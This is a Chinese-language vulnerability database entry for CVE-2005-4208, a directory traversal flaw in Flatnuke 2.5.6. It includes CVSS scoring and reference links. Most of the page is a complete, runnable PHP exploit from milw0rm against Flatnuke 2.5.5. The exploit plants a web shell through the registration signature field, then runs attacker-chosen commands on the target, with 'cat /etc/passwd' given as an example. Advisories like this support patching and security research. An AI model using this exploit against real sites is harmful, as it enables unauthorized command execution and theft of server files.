CVE-2005-4208
CVSS5.0
发布时间 :2005-12-13 06:03:00
修订时间 :2008-09-05 16:56:18
NMCOE    

[原文]Directory traversal vulnerability in Flatnuke 2.5.6 allows remote attackers to access arbitrary files via a .. (dot dot) and null byte (%00) in the id parameter of the read module.


[CNNVD]Flatnuke Index.PHP 目录遍历漏洞(CNNVD-200512-223)

        Flatnuke 2.5.6中存在目录遍历漏洞,远程攻击者可以通过读模块的id参数中的一个..(参数中包含'..')和空字节(%00) 访问任意文件。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4208
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-4208
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200512-223
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/15796
(UNKNOWN)  BID  15796
http://www.securityfocus.com/archive/1/archive/1/419107/100/0/threaded
(UNKNOWN)  BUGTRAQ  20051210 Flatnuke 2.5.6 privilege escalation / remote commands execution exploit
http://securitytracker.com/id?1015339
(UNKNOWN)  SECTRACK  1015339

- 漏洞信息

Flatnuke Index.PHP 目录遍历漏洞
中危 路径遍历
2005-12-13 00:00:00 2006-01-10 00:00:00
远程  
        Flatnuke 2.5.6中存在目录遍历漏洞,远程攻击者可以通过读模块的id参数中的一个..(参数中包含'..')和空字节(%00) 访问任意文件。

- 公告与补丁

        

- 漏洞信息 (1140)

Flatnuke <= 2.5.5 Remote Code Execution (EDBID:1140)
php webapps
2005-08-08 Verified
0 rgod
[点击下载] [点击下载]
<?php
/* Aug 2005, 4th
   Flatnuke 2.5.5 (possibly prior versions) remote code execution
   by rgod
   site: http://rgod.altervista.org

   thanks to UlisseHacker... :)

   make these changes in php.ini if you have troubles
   with this script:
   allow_call_time_pass_reference = on
   register_globals = on						       */

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout", 2);
ob_implicit_flush (1);

echo '<head><title>FlatNuke 2.5.5 remote commands execution</title>
      <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
      <style type="text/css">
      <!--
      body,td,th {color: #00FF00;}
      body {background-color: #000000;}
      .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; }
      .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;
	       font-weight: bold;
	       font-style: italic;
              }
      -->
      </style></head>
      <body>
<p class="Stile6">FlatNuke 2.5.5 (possibly prior versions) remote commands execution</p>
<p class="Stile6">a script by rgod at <a href="http://rgod.altervista.org" target="_blank">http://rgod.altervista.org</a></p>
<table width="84%" >
  <tr>
    <td width="43%">
     <form name="form1" method="post" action="'.$SERVER['PHP_SELF'].'?path=value&host=value&port=value&command=value&proxy=value">
      <p>
       <input type="text" name="host">
      <span class="Stile5">hostname (ex: www.sitename.com) </span></p>
      <p>
        <input type="text" name="path">
        <span class="Stile5">path (ex: /flatnuke/forum/ or /forum/ just /) </span></p>
      <p>
      <input type="text" name="port">
        <span class="Stile5">specify a port other than 80 (default value) </span></p>
      <p>
      <input type="text" name="command">
        <span class="Stile5">a Unix command, example: ls -la to list directories, cat /etc/passwd to show passwd file </span></p>
      <p>
      <input type="text" name="proxy">
        <span class="Stile5">send exploit through an HTTP proxy (ip:port)  </span></p>
      <p>
          <input type="submit" name="Submit" value="go!">
      </p>
    </form></td>
  </tr>
</table>
</body>
</html>';

function show($headeri)
{
$ii=0;
$ji=0;
$ki=0;
$ci=0;
echo '<table border="0"><tr>';
while ($ii <= strlen($headeri)-1)
{
$datai=dechex(ord($headeri[$ii]));
if ($ji==16) {
             $ji=0;
             $ci++;
             echo "<td>  </td>";
             for ($li=0; $li<=15; $li++)
                      { echo "<td>".$headeri[$li+$ki]."</td>";
			    }
            $ki=$ki+16;
            echo "</tr><tr>";
            }
if (strlen($datai)==1) {echo "<td>0".$datai."</td>";} else
{echo "<td>".$datai."</td> ";}
$ii++;
$ji++;
}
for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++)
                      { echo "<td>  </td>";
                       }

for ($li=$ci*16; $li<=strlen($headeri); $li++)
                      { echo "<td>".$headeri[$li]."</td>";
			    }

echo "</tr></table>";
}

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

if (($path<>'') and ($host<>'') and ($command<>''))
{
if ($port=='') {$port=80;}
$data="op=reg&nome=jimyhendrix®pass=jimihendrix&reregpass=jimihendrix&anag=jimihendrix&email=jimihendrix@email.com&homep=".urlencode('http://www.asite.com')."&prof=artist&prov=whereimfrom&ava=clanbomber.png&url_avatar=&firma=".chr(13).urlencode('system($HTTP_GET_VARS[command]);');

if ($proxy=='')
       {$packet="POST ".$path."index.php HTTP/1.1\r\n";}
else
       {
        $c = preg_match_all($proxy_regex,$proxy,$is_proxy);
        if ($c==0) {
                    echo 'check the proxy...<br>';
	            die;
	           }
         else
        {$packet="POST http://".$host.$path."index.php HTTP/1.1\r\n";}
        }

$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*\r\n";
$packet.="Referer: http://".$host.":".$port.$path."index.php?op=vis_reg\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Keep-Alive\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;

show($packet);
if ($proxy=='')
           {$fp=fsockopen(gethostbyname($host),$port);}
           else
           {$parts=explode(':',$proxy);
	    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
	    $fp=fsockopen($parts[0],$parts[1]);
	    if (!$fp) { echo 'No response from proxy...';
			die;
		       }

	    }
fputs($fp,$packet);
$data='';
while ((!feof($fp)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$data)))
   {
      $data.=fread($fp,1);
   }
fclose($fp);
echo nl2br(htmlentities($data));
if ($proxy=='')
       {$packet="GET ".$path."users/jimyhendrix.php?command=".urlencode($command)." HTTP/1.1\r\n";}
else
       {
        $c = preg_match_all($proxy_regex,$proxy,$is_proxy);
        if ($c==0) {
                    echo 'check the proxy...<br>';
	            die;
	           }
         else
        {$packet="GET http://".$host.$path."users/jimyhendrix.php?command=".urlencode($command)." HTTP/1.1\r\n";}
        }

$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n\r\n";
$packet.="Connection: Close\r\n\r\n";
show($packet);
if ($proxy=='')
           {$fp=fsockopen(gethostbyname($host),$port);}
           else
           {$parts=explode(':',$proxy);
	    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
	    $fp=fsockopen($parts[0],$parts[1]);
	    if (!$fp) { echo 'No response from proxy...';
			die;
		       }

	    }
fputs($fp,$packet);
$data='';

if ($proxy=='')
{    $data='';
     while (!feof($fp))
     {
      $data.=fgets($fp);
     }
}
else
{
$data='';
   while ((!feof($fp)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$data)))
   {
      $data.=fread($fp,1);
   }

}

fclose($fp);

if (eregi('HTTP/1.1 200 OK',$data))
    {echo 'Exploit sent...<br> If Flatnuke is unpatched and vulnerable <br>';
     echo 'you will see '.htmlentities($command).' output inside HTML...<br><br>';
    }
else
    {echo 'Error, see output...';}
echo nl2br(htmlentities($data));
}

?>

# milw0rm.com [2005-08-08]
		

- 漏洞信息

21749
FlatNuke Read Module id Parameter Traversal Arbitrary File Access
Remote / Network Access Input Manipulation
Loss of Confidentiality
Exploit Public

- 漏洞描述

- 时间线

2005-12-10 Unknow
2005-12-10 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站